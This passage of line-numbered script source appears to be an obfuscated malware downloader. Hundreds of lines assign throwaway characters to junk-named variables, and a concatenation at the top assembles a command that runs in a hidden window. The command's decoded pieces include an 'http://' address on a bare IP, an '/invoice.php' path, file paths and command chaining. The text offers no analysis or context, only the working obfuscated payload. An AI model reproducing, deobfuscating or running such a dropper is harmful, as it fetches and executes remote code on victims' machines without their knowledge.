+ wuubs + fxrekvll + eeujcw + wuubs + ypibdzcyr + twvnldmpt + lwquvzhta + hfvnpps + kdqyaioun + eeujcw + twvnldmpt + unecew + cdclj + rtzvgpfu + wuubs + lwquvzhta + grwaxwtk + twvnldmpt + wuubs + gkhzb + qbkeifp + grwaxwtk + xerdavi + cdclj + broqmqrr + loyggy + rztttd + cdclj + yzamvqfv + wuubs + wlszyw + qbkeifp + ninqykskn + qukicud + lwquvzhta + snuddefs + twvnldmpt + twvnldmpt + qbkeifp + nhehp + dingw + dingw + brhwcchq + bzbxm + tmxyzlmh + wlszyw + brhwcchq + syscza + tmxyzlmh + wlszyw + brhwcchq + wlszyw + gkbquwiw + xzhezu + vcztzvxff + dingw + cdclj + broqmqrr + loyggy + rztttd + cdclj + yzamvqfv + wuubs + wlszyw + qbkeifp + snuddefs + qbkeifp + zczifpn + sebkcrwf + sebkcrwf + ypibdzcyr + twvnldmpt + qfrwkzg + okulwjngy + twvnldmpt + lwquvzhta + grwaxwtk + twvnldmpt + wuubs + gkhzb + qbkeifp + grwaxwtk + xerdavi + cdclj + broqmqrr + loyggy + rztttd + cdclj + yzamvqfv + wuubs + wlszyw + qbkeifp + ninqykskn + qukicud + sebkcrwf + sebkcrwf + yzamvqfv + gkhzb + ninqykskn + lwquvzhta + dingw + yzamvqfv + lwquvzhta + broqmqrr + wuubs + twvnldmpt + lwquvzhta + eeujcw + ypibdzcyr + wuubs + lwquvzhta + xerdavi + xerdavi + brhwcchq + bzbxm + tmxyzlmh + wlszyw + brhwcchq + syscza + tmxyzlmh + wlszyw + brhwcchq + wlszyw + gkbquwiw + xzhezu + vcztzvxff + awgwrtl + vgsxrzgh + vgsxrzgh + vgsxrzgh + vgsxrzgh + xerdavi + ninqykskn + qfrwkzg + loyggy + xdhvxm + xdhvxm + xdhvxm + okulwjngy + rztttd + rztttd + twvnldmpt + xerdavi + sebkcrwf + sebkcrwf + yzamvqfv + gkhzb + ninqykskn + lwquvzhta + dingw + yzamvqfv + lwquvzhta + okulwjngy + wuubs + tfyiiewq + ypibdzcyr + loyggy + okulwjngy + tmxyzlmh + gkbquwiw + lwquvzhta + dingw + ypibdzcyr + lwquvzhta + xerdavi + xerdavi + brhwcchq + bzbxm + tmxyzlmh + wlszyw + brhwcchq + syscza + tmxyzlmh + wlszyw + brhwcchq + wlszyw + gkbquwiw + xzhezu + vcztzvxff + awgwrtl + vgsxrzgh + vgsxrzgh + vgsxrzgh + vgsxrzgh + xerdavi + ninqykskn + qfrwkzg + loyggy + xdhvxm + xdhvxm + xdhvxm + okulwjngy + rztttd + rztttd + twvnldmpt + xerdavi + brhwcchq + sfgxd + vgsxrzgh + sfgxd + bzbxm + vcztzvxff + vgsxrzgh + vcztzvxff + vgsxrzgh + gkbquwiw + bzbxm + vgsxrzgh + bzbxm + bzbxm + wlszyw + ninqykskn + rtzvgpfu + rtzvgpfu, 0, false ); |
|
14 | } | |
15 | wlszyw = "."; | |
16 | vcztzvxff = "K"; | |
17 | vcztzvxff = "b"; | |
18 | vcztzvxff = "B"; | |
19 | vcztzvxff = "j"; | |
20 | vcztzvxff = "x"; | |
21 | vcztzvxff = "z"; | |
22 | vcztzvxff = "y"; | |
23 | vcztzvxff = "s"; | |
24 | vcztzvxff = "B"; | |
25 | vcztzvxff = "D"; | |
26 | vcztzvxff = "S"; | |
27 | vcztzvxff = "Q"; | |
28 | vcztzvxff = "s"; | |
29 | vcztzvxff = "o"; | |
30 | vcztzvxff = "f"; | |
31 | vcztzvxff = "F"; | |
32 | vcztzvxff = "U"; | |
33 | vcztzvxff = "H"; | |
34 | vcztzvxff = "Y"; | |
35 | vcztzvxff = "o"; | |
36 | vcztzvxff = "t"; | |
37 | vcztzvxff = "5"; | |
38 | bzbxm = "q"; | |
39 | bzbxm = "c"; | |
40 | bzbxm = "g"; | |
41 | bzbxm = "J"; | |
42 | bzbxm = "w"; | |
43 | bzbxm = "h"; | |
44 | bzbxm = "c"; | |
45 | bzbxm = "c"; | |
46 | bzbxm = "x"; | |
47 | bzbxm = "f"; | |
48 | bzbxm = "K"; | |
49 | bzbxm = "g"; | |
50 | bzbxm = "9"; | |
51 | sfgxd = "s"; | |
52 | sfgxd = "O"; | |
53 | sfgxd = "g"; | |
54 | sfgxd = "G"; | |
55 | sfgxd = "v"; | |
56 | sfgxd = "O"; | |
57 | sfgxd = "p"; | |
58 | sfgxd = "Z"; | |
59 | sfgxd = "e"; | |
60 | sfgxd = "a"; | |
61 | sfgxd = "y"; | |
62 | sfgxd = "R"; | |
63 | sfgxd = "h"; | |
64 | sfgxd = "e"; | |
65 | sfgxd = "M"; | |
66 | sfgxd = "i"; | |
67 | sfgxd = "X"; | |
68 | sfgxd = "U"; | |
69 | sfgxd = "Q"; | |
70 | sfgxd = "A"; | |
71 | sfgxd = "x"; | |
72 | sfgxd = "I"; | |
73 | sfgxd = "N"; | |
74 | sfgxd = "x"; | |
75 | sfgxd = "g"; | |
76 | sfgxd = "N"; | |
77 | sfgxd = "N"; | |
78 | sfgxd = "w"; | |
79 | sfgxd = "r"; | |
80 | sfgxd = "p"; | |
81 | sfgxd = "o"; | |
82 | sfgxd = "Z"; | |
83 | sfgxd = "y"; | |
84 | sfgxd = "M"; | |
85 | sfgxd = "o"; | |
86 | sfgxd = "e"; | |
87 | sfgxd = "b"; | |
88 | sfgxd = "P"; | |
89 | sfgxd = "6"; | |
90 | cdclj = "i"; | |
91 | okulwjngy = "B"; | |
92 | okulwjngy = "j"; | |
93 | okulwjngy = "r"; | |
94 | gkbquwiw = "i"; | |
95 | gkbquwiw = "h"; | |
96 | gkbquwiw = "s"; | |
97 | gkbquwiw = "a"; | |
98 | gkbquwiw = "n"; | |
99 | gkbquwiw = "V"; | |
100 | gkbquwiw = "A"; | |
101 | gkbquwiw = "F"; | |
102 | gkbquwiw = "u"; | |
103 | gkbquwiw = "M"; | |
104 | gkbquwiw = "M"; | |
105 | gkbquwiw = "X"; | |
106 | gkbquwiw = "C"; | |
107 | gkbquwiw = "i"; | |
108 | gkbquwiw = "L"; | |
109 | gkbquwiw = "S"; | |
110 | gkbquwiw = "E"; | |
111 | gkbquwiw = "L"; | |
112 | gkbquwiw = "H"; | |
113 | gkbquwiw = "F"; | |
114 | gkbquwiw = "R"; | |
115 | gkbquwiw = "z"; | |
116 | gkbquwiw = "W"; | |
117 | gkbquwiw = "p"; | |
118 | gkbquwiw = "C"; | |
119 | gkbquwiw = "G"; | |
120 | gkbquwiw = "s"; | |
121 | gkbquwiw = "o"; | |
122 | gkbquwiw = "W"; | |
123 | gkbquwiw = "a"; | |
124 | gkbquwiw = "o"; | |
125 | gkbquwiw = "z"; | |
126 | gkbquwiw = "i"; | |
127 | gkbquwiw = "D"; | |
128 | gkbquwiw = "q"; | |
129 | gkbquwiw = "c"; | |
130 | gkbquwiw = "E"; | |
131 | gkbquwiw = "H"; | |
132 | gkbquwiw = "Q"; | |
133 | gkbquwiw = "r"; | |
134 | gkbquwiw = "z"; | |
135 | gkbquwiw = "2"; | |
136 | broqmqrr = "n"; | |
137 | lwquvzhta = "g"; | |
138 | lwquvzhta = "H"; | |
139 | lwquvzhta = "w"; | |
140 | lwquvzhta = "o"; | |
141 | lwquvzhta = "B"; | |
142 | lwquvzhta = "T"; | |
143 | lwquvzhta = "q"; | |
144 | lwquvzhta = "y"; | |
145 | lwquvzhta = "u"; | |
146 | lwquvzhta = "V"; | |
147 | lwquvzhta = "a"; | |
148 | lwquvzhta = "L"; | |
149 | lwquvzhta = "y"; | |
150 | lwquvzhta = "u"; | |
151 | lwquvzhta = "J"; | |
152 | lwquvzhta = "B"; | |
153 | lwquvzhta = "f"; | |
154 | lwquvzhta = "C"; | |
155 | lwquvzhta = "I"; | |
156 | lwquvzhta = "f"; | |
157 | lwquvzhta = "I"; | |
158 | lwquvzhta = "b"; | |
159 | lwquvzhta = "d"; | |
160 | lwquvzhta = "h"; | |
161 | lwquvzhta = "U"; | |
162 | lwquvzhta = "Q"; | |
163 | lwquvzhta = "f"; | |
164 | lwquvzhta = "I"; | |
165 | lwquvzhta = "B"; | |
166 | lwquvzhta = "G"; | |
167 | lwquvzhta = "H"; | |
168 | lwquvzhta = "b"; | |
169 | lwquvzhta = "B"; | |
170 | lwquvzhta = "D"; | |
171 | lwquvzhta = "z"; | |
172 | lwquvzhta = "x"; | |
173 | lwquvzhta = "r"; | |
174 | lwquvzhta = " "; | |
175 | syscza = "V"; | |
176 | syscza = "P"; | |
177 | syscza = "o"; | |
178 | syscza = "k"; | |
179 | syscza = "L"; | |
180 | syscza = "Q"; | |
181 | syscza = "v"; | |
182 | syscza = "k"; | |
183 | syscza = "A"; | |
184 | syscza = "B"; | |
185 | syscza = "v"; | |
186 | syscza = "S"; | |
187 | syscza = "E"; | |
188 | syscza = "X"; | |
189 | syscza = "B"; | |
190 | syscza = "r"; | |
191 | syscza = "Y"; | |
192 | syscza = "H"; | |
193 | syscza = "o"; | |
194 | syscza = "F"; | |
195 | syscza = "Y"; | |
196 | syscza = "C"; | |
197 | syscza = "D"; | |
198 | syscza = "s"; | |
199 | syscza = "B"; | |
200 | syscza = "U"; | |
201 | syscza = "B"; | |
202 | syscza = "w"; | |
203 | syscza = "C"; | |
204 | syscza = "D"; | |
205 | syscza = "f"; | |
206 | syscza = "a"; | |
207 | syscza = "L"; | |
208 | syscza = "C"; | |
209 | syscza = "B"; | |
210 | syscza = "d"; | |
211 | syscza = "H"; | |
212 | syscza = "t"; | |
213 | syscza = "i"; | |
214 | syscza = "4"; | |
215 | ypibdzcyr = "b"; | |
216 | ypibdzcyr = "O"; | |
217 | ypibdzcyr = "P"; | |
218 | ypibdzcyr = "M"; | |
219 | ypibdzcyr = "R"; | |
220 | ypibdzcyr = "B"; | |
221 | ypibdzcyr = "B"; | |
222 | ypibdzcyr = "o"; | |
223 | ypibdzcyr = "p"; | |
224 | ypibdzcyr = "f"; | |
225 | ypibdzcyr = "W"; | |
226 | ypibdzcyr = "z"; | |
227 | ypibdzcyr = "Y"; | |
228 | ypibdzcyr = "R"; | |
229 | ypibdzcyr = "l"; | |
230 | ypibdzcyr = "n"; | |
231 | ypibdzcyr = "z"; | |
232 | ypibdzcyr = "f"; | |
233 | ypibdzcyr = "V"; | |
234 | ypibdzcyr = "j"; | |
235 | ypibdzcyr = "Q"; | |
236 | ypibdzcyr = "l"; | |
237 | ypibdzcyr = "q"; | |
238 | ypibdzcyr = "M"; | |
239 | ypibdzcyr = "N"; | |
240 | ypibdzcyr = "E"; | |
241 | ypibdzcyr = "t"; | |
242 | ypibdzcyr = "i"; | |
243 | ypibdzcyr = "Q"; | |
244 | ypibdzcyr = "b"; | |
245 | ypibdzcyr = "s"; | |
246 | dingw = "P"; | |
247 | dingw = "L"; | |
248 | dingw = "s"; | |
249 | dingw = "A"; | |
250 | dingw = "h"; | |
251 | dingw = "B"; | |
252 | dingw = "n"; | |
253 | dingw = "F"; | |
254 | dingw = "t"; | |
255 | dingw = "Y"; | |
256 | dingw = "J"; | |
257 | dingw = "R"; | |
258 | dingw = "g"; | |
259 | dingw = "C"; | |
260 | dingw = "B"; | |
261 | dingw = "I"; | |
262 | dingw = "z"; | |
263 | dingw = "C"; | |
264 | dingw = "J"; | |
265 | dingw = "h"; | |
266 | dingw = "M"; | |
267 | dingw = "v"; | |
268 | dingw = "C"; | |
269 | dingw = "O"; | |
270 | dingw = "I"; | |
271 | dingw = "t"; | |
272 | dingw = "I"; | |
273 | dingw = "q"; | |
274 | dingw = "Q"; | |
275 | dingw = "K"; | |
276 | dingw = "D"; | |
277 | dingw = "/"; | |
278 | brhwcchq = "C"; | |
279 | brhwcchq = "l"; | |
280 | brhwcchq = "m"; | |
281 | brhwcchq = "F"; | |
282 | brhwcchq = "N"; | |
283 | brhwcchq = "v"; | |
284 | brhwcchq = "A"; | |
285 | brhwcchq = "1"; | |
286 | qfrwkzg = "n"; | |
287 | qfrwkzg = "u"; | |
288 | qfrwkzg = "u"; | |
289 | qfrwkzg = "V"; | |
290 | qfrwkzg = "V"; | |
291 | qfrwkzg = "c"; | |
292 | qfrwkzg = "G"; | |
293 | qfrwkzg = "K"; | |
294 | qfrwkzg = "v"; | |
295 | qfrwkzg = "q"; | |
296 | qfrwkzg = "D"; | |
297 | qfrwkzg = "L"; | |
298 | qfrwkzg = "Y"; | |
299 | qfrwkzg = "n"; | |
300 | qfrwkzg = "i"; | |
301 | qfrwkzg = "c"; | |
302 | qfrwkzg = "J"; | |
303 | qfrwkzg = "W"; | |
304 | qfrwkzg = "f"; | |
305 | qfrwkzg = "l"; | |
306 | qfrwkzg = "c"; | |
307 | qfrwkzg = "s"; | |
308 | qfrwkzg = "e"; | |
309 | qfrwkzg = "e"; | |
310 | qfrwkzg = "k"; | |
311 | qfrwkzg = "l"; | |
312 | qfrwkzg = "g"; | |
313 | qfrwkzg = "T"; | |
314 | qfrwkzg = "D"; | |
315 | qfrwkzg = "z"; | |
316 | qfrwkzg = "n"; | |
317 | qfrwkzg = "k"; | |
318 | qfrwkzg = "a"; | |
319 | bhuveqdrl = "b"; | |
320 | bhuveqdrl = "T"; | |
321 | bhuveqdrl = "I"; | |
322 | bhuveqdrl = "N"; | |
323 | bhuveqdrl = "g"; | |
324 | bhuveqdrl = "G"; | |
325 | bhuveqdrl = "E"; | |
326 | bhuveqdrl = "z"; | |
327 | bhuveqdrl = "s"; | |
328 | bhuveqdrl = "g"; | |
329 | bhuveqdrl = "C"; | |
330 | bhuveqdrl = "s"; | |
331 | bhuveqdrl = "B"; | |
332 | bhuveqdrl = "d"; | |
333 | bhuveqdrl = "o"; | |
334 | bhuveqdrl = "m"; | |
335 | bhuveqdrl = "D"; | |
336 | bhuveqdrl = "r"; | |
337 | bhuveqdrl = "u"; | |
338 | bhuveqdrl = "H"; | |
339 | bhuveqdrl = "f"; | |
340 | bhuveqdrl = "U"; | |
341 | bhuveqdrl = "i"; | |
342 | bhuveqdrl = "P"; | |
343 | bhuveqdrl = "f"; | |
344 | bhuveqdrl = "q"; | |
345 | bhuveqdrl = "a"; | |
346 | bhuveqdrl = "A"; | |
347 | bhuveqdrl = "L"; | |
348 | bhuveqdrl = "X"; | |
349 | bhuveqdrl = "B"; | |
350 | bhuveqdrl = "b"; | |
351 | bhuveqdrl = "o"; | |
352 | bhuveqdrl = "X"; | |
353 | bhuveqdrl = "w"; | |
354 | bhuveqdrl = "a"; | |
355 | bhuveqdrl = "M"; | |
356 | bhuveqdrl = "X"; | |
357 | bhuveqdrl = "r"; | |
358 | bhuveqdrl = "L"; | |
359 | xqxuydhyi = "h"; | |
360 | xqxuydhyi = "w"; | |
361 | xqxuydhyi = "V"; | |
362 | xqxuydhyi = "Z"; | |
363 | xqxuydhyi = "J"; | |
364 | xqxuydhyi = "C"; | |
365 | xqxuydhyi = "w"; | |
366 | xqxuydhyi = "m"; | |
367 | xqxuydhyi = "b"; | |
368 | xqxuydhyi = "y"; | |
369 | xqxuydhyi = "V"; | |
370 | xqxuydhyi = "u"; | |
371 | xqxuydhyi = "S"; | |
372 | xqxuydhyi = "r"; | |
373 | xqxuydhyi = "e"; | |
374 | xqxuydhyi = "o"; | |
375 | xqxuydhyi = "z"; | |
376 | xqxuydhyi = "a"; | |
377 | xqxuydhyi = "e"; | |
378 | xqxuydhyi = "t"; | |
379 | xqxuydhyi = "c"; | |
380 | xqxuydhyi = "l"; | |
381 | xqxuydhyi = "W"; | |
382 | xqxuydhyi = "F"; | |
383 | xqxuydhyi = "Y"; | |
384 | daque = "v"; | |
385 | daque = "R"; | |
386 | daque = "i"; | |
387 | daque = "r"; | |
388 | daque = "A"; | |
389 | daque = "G"; | |
390 | daque = "l"; | |
391 | daque = "p"; | |
392 | daque = "D"; | |
393 | daque = "R"; | |
394 | daque = "W"; | |
395 | wlpdla = "X"; | |
396 | wlpdla = "C"; | |
397 | wlpdla = "B"; | |
398 | wlpdla = "A"; | |
399 | wlpdla = "B"; | |
400 | wlpdla = "U"; | |
401 | wlpdla = "I"; | |
402 | wlpdla = "x"; | |
403 | wlpdla = "s"; | |
404 | wlpdla = "s"; | |
405 | wlpdla = "m"; | |
406 | wlpdla = "p"; | |
407 | wlpdla = "S"; | |
408 | wlpdla = "A"; | |
409 | wlpdla = "Y"; | |
410 | wlpdla = "U"; | |
411 | wlpdla = "h"; | |
412 | wlpdla = "Q"; | |
413 | wlpdla = "U"; | |
414 | wlpdla = "z"; | |
415 | wlpdla = "T"; | |
416 | wlpdla = "f"; | |
417 | wlpdla = "S"; | |
418 | wlpdla = "I"; | |
419 | wlpdla = "F"; | |
420 | wlpdla = "z"; | |
421 | wlpdla = "l"; | |
422 | wlpdla = "T"; | |
423 | wlpdla = "d"; | |
424 | wlpdla = "b"; | |
425 | wlpdla = "m"; | |
426 | wlpdla = "x"; | |
427 | wlpdla = "k"; | |
428 | wlpdla = "R"; | |
429 | wlpdla = "S"; | |
430 | wlpdla = "z"; | |
431 | wlpdla = "k"; | |
432 | wlpdla = "f"; | |
433 | wlpdla = "w"; | |
434 | wlpdla = "X"; | |
435 | wlpdla = "j"; | |
436 | qbkeifp = "w"; | |
437 | qbkeifp = "m"; | |
438 | qbkeifp = "P"; | |
439 | qbkeifp = "s"; | |
440 | qbkeifp = "p"; | |
441 | fxrekvll = "l"; | |
442 | fxrekvll = "X"; | |
443 | fxrekvll = "L"; | |
444 | fxrekvll = "U"; | |
445 | fxrekvll = "i"; | |
446 | fxrekvll = "p"; | |
447 | fxrekvll = "q"; | |
448 | qukicud = "T"; | |
449 | qukicud = "x"; | |
450 | qukicud = "q"; | |
451 | qukicud = "m"; | |
452 | qukicud = "l"; | |
453 | qukicud = "g"; | |
454 | qukicud = "p"; | |
455 | qukicud = "K"; | |
456 | qukicud = "T"; | |
457 | qukicud = "J"; | |
458 | qukicud = "f"; | |
459 | qukicud = "E"; | |
460 | qukicud = "B"; | |
461 | qukicud = "w"; | |
462 | qukicud = "u"; | |
463 | qukicud = "H"; | |
464 | qukicud = "b"; | |
465 | qukicud = "C"; | |
466 | qukicud = "u"; | |
467 | qukicud = "m"; | |
468 | qukicud = "T"; | |
469 | qukicud = "e"; | |
470 | qukicud = "F"; | |
471 | qukicud = "k"; | |
472 | qukicud = "H"; | |
473 | qukicud = "N"; | |
474 | qukicud = "P"; | |
475 | qukicud = "B"; | |
476 | qukicud = "q"; | |
477 | qukicud = "j"; | |
478 | qukicud = "q"; | |
479 | qukicud = "E"; | |
480 | qukicud = "S"; | |
481 | qukicud = "f"; | |
482 | gtxjav = "f"; | |
483 | gtxjav = "l"; | |
484 | gtxjav = "V"; | |
485 | gtxjav = "i"; | |
486 | gtxjav = "G"; | |
487 | gtxjav = "N"; | |
488 | gtxjav = "P"; | |
489 | gtxjav = "e"; | |
490 | gtxjav = "m"; | |
491 | gtxjav = "M"; | |
492 | gtxjav = "q"; | |
493 | gtxjav = "n"; | |
494 | gtxjav = "z"; | |
495 | gtxjav = "s"; | |
496 | gtxjav = "K"; | |
497 | gtxjav = "q"; | |
498 | gtxjav = "Q"; | |
499 | gtxjav = "A"; | |
500 | gtxjav = "c"; | |
501 | gtxjav = "E"; | |
502 | gtxjav = "L"; | |
503 | gtxjav = "k"; | |
504 | gtxjav = "i"; | |
505 | gtxjav = "E"; | |
506 | gtxjav = "d"; | |
507 | gtxjav = "t"; | |
508 | gtxjav = "j"; | |
509 | gtxjav = "K"; | |
510 | gtxjav = "N"; | |
511 | gtxjav = "C"; | |
512 | sebkcrwf = "z"; | |
513 | sebkcrwf = "Q"; | |
514 | sebkcrwf = "V"; | |
515 | sebkcrwf = "x"; | |
516 | sebkcrwf = "M"; | |
517 | sebkcrwf = "w"; | |
518 | sebkcrwf = "p"; | |
519 | sebkcrwf = "L"; | |
520 | sebkcrwf = "u"; | |
521 | sebkcrwf = "M"; | |
522 | sebkcrwf = "&"; | |
523 | xdhvxm = "E"; | |
524 | xdhvxm = "Z"; | |
525 | xdhvxm = "N"; | |
526 | xdhvxm = "E"; | |
527 | xdhvxm = "b"; | |
528 | xdhvxm = "G"; | |
529 | xdhvxm = "I"; | |
530 | xdhvxm = "p"; | |
531 | xdhvxm = "m"; | |
532 | xdhvxm = "d"; | |
533 | xdhvxm = "U"; | |
534 | xdhvxm = "J"; | |
535 | xdhvxm = "x"; | |
536 | xdhvxm = "s"; | |
537 | xdhvxm = "J"; | |
538 | xdhvxm = "W"; | |
539 | xdhvxm = "v"; | |
540 | xdhvxm = "A"; | |
541 | xdhvxm = "y"; | |
542 | xdhvxm = "w"; | |
543 | xdhvxm = "t"; | |
544 | xdhvxm = "s"; | |
545 | xdhvxm = "B"; | |
546 | xdhvxm = "C"; | |
547 | xdhvxm = "q"; | |
548 | xdhvxm = "o"; | |
549 | xdhvxm = "I"; | |
550 | xdhvxm = "S"; | |
551 | xdhvxm = "w"; | |
552 | loyggy = "r"; | |
553 | loyggy = "e"; | |
554 | loyggy = "y"; | |
555 | loyggy = "l"; | |
556 | loyggy = "X"; | |
557 | loyggy = "G"; | |
558 | loyggy = "V"; | |
559 | loyggy = "h"; | |
560 | loyggy = "x"; | |
561 | loyggy = "n"; | |
562 | loyggy = "a"; | |
563 | loyggy = "C"; | |
564 | loyggy = "v"; | |
565 | rztttd = "Z"; | |
566 | rztttd = "h"; | |
567 | rztttd = "t"; | |
568 | rztttd = "P"; | |
569 | rztttd = "K"; | |
570 | rztttd = "k"; | |
571 | rztttd = "c"; | |
572 | rztttd = "D"; | |
573 | rztttd = "c"; | |
574 | rztttd = "j"; | |
575 | rztttd = "d"; | |
576 | rztttd = "J"; | |
577 | rztttd = "i"; | |
578 | rztttd = "c"; | |
579 | rztttd = "n"; | |
580 | rztttd = "l"; | |
581 | rztttd = "q"; | |
582 | rztttd = "P"; | |
583 | rztttd = "J"; | |
584 | rztttd = "o"; | |
585 | qmmqujc = "P"; | |
586 | bikkf = "J"; | |
587 | bikkf = "j"; | |
588 | bikkf = "V"; | |
589 | bikkf = "d"; | |
590 | bikkf = "K"; | |
591 | bikkf = "h"; | |
592 | bikkf = "r"; | |
593 | bikkf = "s"; | |
594 | bikkf = "d"; | |
595 | bikkf = "o"; | |
596 | bikkf = "x"; | |
597 | bikkf = "F"; | |
598 | bikkf = "g"; | |
599 | bikkf = "U"; | |
600 | bikkf = "S"; | |
601 | bikkf = "P"; | |
602 | bikkf = "G"; | |
603 | bikkf = "G"; | |
604 | bikkf = "b"; | |
605 | ptqovzp = "i"; | |
606 | ptqovzp = "T"; | |
607 | ptqovzp = "S"; | |
608 | ptqovzp = "g"; | |
609 | ptqovzp = "m"; | |
610 | ptqovzp = "R"; | |
611 | gkhzb = "y"; | |
612 | gkhzb = "q"; | |
613 | gkhzb = "I"; | |
614 | gkhzb = "T"; | |
615 | gkhzb = "S"; | |
616 | gkhzb = "n"; | |
617 | gkhzb = "Z"; | |
618 | gkhzb = "f"; | |
619 | gkhzb = "h"; | |
620 | gkhzb = "Q"; | |
621 | gkhzb = "G"; | |
622 | gkhzb = "D"; | |
623 | gkhzb = "p"; | |
624 | gkhzb = "c"; | |
625 | gkhzb = "I"; | |
626 | gkhzb = "b"; | |
627 | gkhzb = "W"; | |
628 | gkhzb = "Q"; | |
629 | gkhzb = "y"; | |
630 | gkhzb = "c"; | |
631 | gkhzb = "c"; | |
632 | gkhzb = "K"; | |
633 | gkhzb = "Q"; | |
634 | gkhzb = "f"; | |
635 | gkhzb = "z"; | |
636 | gkhzb = "f"; | |
637 | gkhzb = "X"; | |
638 | gkhzb = "e"; | |
639 | gkhzb = "J"; | |
640 | gkhzb = "N"; | |
641 | gkhzb = "V"; | |
642 | gkhzb = "J"; | |
643 | gkhzb = "W"; | |
644 | gkhzb = "m"; | |
645 | avybwys = "f"; | |
646 | avybwys = "D"; | |
647 | avybwys = "W"; | |
648 | avybwys = "M"; | |
649 | avybwys = "N"; | |
650 | avybwys = "e"; | |
651 | avybwys = "V"; | |
652 | avybwys = "X"; | |
653 | avybwys = "z"; | |
654 | avybwys = "L"; | |
655 | avybwys = "a"; | |
656 | avybwys = "w"; | |
657 | avybwys = "Y"; | |
658 | avybwys = "W"; | |
659 | avybwys = "l"; | |
660 | avybwys = "c"; | |
661 | avybwys = "U"; | |
662 | avybwys = "b"; | |
663 | avybwys = "t"; | |
664 | avybwys = "i"; | |
665 | avybwys = "U"; | |
666 | avybwys = "Q"; | |
667 | avybwys = "D"; | |
668 | avybwys = "B"; | |
669 | avybwys = "B"; | |
670 | avybwys = "m"; | |
671 | avybwys = "M"; | |
672 | avybwys = "s"; | |
673 | avybwys = "K"; | |
674 | avybwys = "R"; | |
675 | avybwys = "f"; | |
676 | avybwys = "t"; | |
677 | avybwys = "p"; | |
678 | avybwys = "Y"; | |
679 | avybwys = "p"; | |
680 | avybwys = "J"; | |
681 | avybwys = "s"; | |
682 | avybwys = "p"; | |
683 | avybwys = "E"; | |
684 | avybwys = "K"; | |
685 | avybwys = "G"; | |
686 | avybwys = "K"; | |
687 | xerdavi = "g"; | |
688 | xerdavi = "N"; | |
689 | xerdavi = "m"; | |
690 | xerdavi = "L"; | |
691 | xerdavi = "a"; | |
692 | xerdavi = "e"; | |
693 | xerdavi = "r"; | |
694 | xerdavi = "u"; | |
695 | xerdavi = "F"; | |
696 | xerdavi = "J"; | |
697 | xerdavi = "M"; | |
698 | xerdavi = "k"; | |
699 | xerdavi = "L"; | |
700 | xerdavi = "z"; | |
701 | xerdavi = "v"; | |
702 | xerdavi = "B"; | |
703 | xerdavi = "U"; | |
704 | xerdavi = "w"; | |
705 | xerdavi = "r"; | |
706 | xerdavi = "P"; | |
707 | xerdavi = "W"; | |
708 | xerdavi = "F"; | |
709 | xerdavi = "N"; | |
710 | xerdavi = "P"; | |
711 | xerdavi = "e"; | |
712 | xerdavi = "y"; | |
713 | xerdavi = "Z"; | |
714 | xerdavi = "r"; | |
715 | xerdavi = "E"; | |
716 | xerdavi = "N"; | |
717 | xerdavi = "D"; | |
718 | xerdavi = "M"; | |
719 | xerdavi = "Y"; | |
720 | xerdavi = "Y"; | |
721 | xerdavi = "Z"; | |
722 | xerdavi = "M"; | |
723 | xerdavi = "Y"; | |
724 | xerdavi = "A"; | |
725 | xerdavi = "E"; | |
726 | xerdavi = "\\"; | |
727 | xzhezu = "J"; | |
728 | xzhezu = "l"; | |
729 | xzhezu = "Z"; | |
730 | xzhezu = "E"; | |
731 | xzhezu = "U"; | |
732 | xzhezu = "F"; | |
733 | xzhezu = "J"; | |
734 | xzhezu = "W"; | |
735 | xzhezu = "s"; | |
736 | xzhezu = "F"; | |
737 | xzhezu = "j"; | |
738 | xzhezu = "0"; | |
739 | nhehp = "Q"; | |
740 | nhehp = "a"; | |
741 | nhehp = "y"; | |
742 | nhehp = "V"; | |
743 | nhehp = "J"; | |
744 | nhehp = "k"; | |
745 | nhehp = "b"; | |
746 | nhehp = "E"; | |
747 | nhehp = "Y"; | |
748 | nhehp = "R"; | |
749 | nhehp = "g"; | |
750 | nhehp = "f"; | |
751 | nhehp = "h"; | |
752 | nhehp = "B"; | |
753 | nhehp = "G"; | |
754 | nhehp = "R"; | |
755 | nhehp = "V"; | |
756 | nhehp = ":"; | |
757 | snuddefs = "W"; | |
758 | snuddefs = "v"; | |
759 | snuddefs = "M"; | |
760 | snuddefs = "q"; | |
761 | snuddefs = "n"; | |
762 | snuddefs = "w"; | |
763 | snuddefs = "L"; | |
764 | snuddefs = "l"; | |
765 | snuddefs = "V"; | |
766 | snuddefs = "h"; | |
767 | dljvo = "U"; | |
768 | dljvo = "d"; | |
769 | dljvo = "Y"; | |
770 | dljvo = "A"; | |
771 | dljvo = "j"; | |
772 | dljvo = "m"; | |
773 | dljvo = "R"; | |
774 | dljvo = "s"; | |
775 | dljvo = "n"; | |
776 | dljvo = "A"; | |
777 | dljvo = "e"; | |
778 | dljvo = "A"; | |
779 | dljvo = "I"; | |
780 | dljvo = "v"; | |
781 | dljvo = "r"; | |
782 | dljvo = "O"; | |
783 | dljvo = "Q"; | |
784 | dljvo = "s"; | |
785 | dljvo = "w"; | |
786 | dljvo = "y"; | |
787 | dljvo = "p"; | |
788 | dljvo = "S"; | |
789 | dljvo = "C"; | |
790 | dljvo = "h"; | |
791 | dljvo = "n"; | |
792 | dljvo = "I"; | |
793 | dljvo = "F"; | |
794 | dljvo = "w"; | |
795 | dljvo = "R"; | |
796 | dljvo = "q"; | |
797 | dljvo = "J"; | |
798 | dljvo = "u"; | |
799 | dljvo = "I"; | |
800 | dljvo = "z"; | |
801 | dljvo = "U"; | |
802 | unecew = "R"; | |
803 | unecew = "B"; | |
804 | unecew = "w"; | |
805 | unecew = "h"; | |
806 | unecew = "L"; | |
807 | unecew = "v"; | |
808 | unecew = "o"; | |
809 | unecew = "R"; | |
810 | unecew = "L"; | |
811 | unecew = "h"; | |
812 | unecew = "F"; | |
813 | kjeda = "I"; | |
814 | kjeda = "M"; | |
815 | kjeda = "z"; | |
816 | kjeda = "O"; | |
817 | kjeda = "I"; | |
818 | ninqykskn = "R"; | |
819 | ninqykskn = "h"; | |
820 | ninqykskn = "F"; | |
821 | ninqykskn = "g"; | |
822 | ninqykskn = "v"; | |
823 | ninqykskn = "H"; | |
824 | ninqykskn = "s"; | |
825 | ninqykskn = "Y"; | |
826 | ninqykskn = "Z"; | |
827 | ninqykskn = "v"; | |
828 | ninqykskn = "G"; | |
829 | ninqykskn = "g"; | |
830 | ninqykskn = "G"; | |
831 | ninqykskn = "r"; | |
832 | ninqykskn = "D"; | |
833 | ninqykskn = "N"; | |
834 | ninqykskn = "d"; | |
835 | ninqykskn = "J"; | |
836 | ninqykskn = "q"; | |
837 | ninqykskn = "I"; | |
838 | ninqykskn = "u"; | |
